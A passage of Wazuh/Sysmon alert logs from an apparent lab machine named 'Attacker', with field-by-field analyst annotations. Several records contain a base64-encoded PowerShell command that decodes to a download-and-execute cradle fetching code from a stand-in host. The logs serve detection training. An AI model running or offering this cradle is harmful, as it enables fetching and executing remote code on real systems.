ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:21.060 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce5-680a-df0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10556 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 34 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1150742 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:22.3308890Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282753 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:22.313
ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00}
ProcessId: 10556
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_afeyzpts.2r4.ps1
CreationUtcTime: 2025-04-24 22:36:22.313
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:22.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce5-680a-df0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10556 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_afeyzpts.2r4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:22.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1153511 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:23.3718738Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282772 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:22.844
ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00}
ProcessId: 2804
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00}
ParentProcessId: 10556
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:22.844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce6-680a-e10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2804 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10556 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 35 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1161578 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:23.5843071Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282774 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION Text severity level (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:23.575
ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00}
ProcessId: 2804
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1
CreationUtcTime: 2025-04-24 22:36:23.575
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:23.575 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce6-680a-e10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2804 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:23.575 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1164343 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:24.7064061Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282787 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION Text severity level (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:24.704
ProcessGuid: {94294ddc-bcdc-680a-d70a-000000000e00}
ProcessId: 13216
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_qv3prkde.0h0.ps1
CreationUtcTime: 2025-04-24 22:36:24.699
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:24.704 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcdc-680a-d70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13216 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_qv3prkde.0h0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:24.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1167048 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:26.9852980Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282793 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION Text severity level (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:24.351
ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00}
ProcessId: 14284
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00}
ParentProcessId: 2804
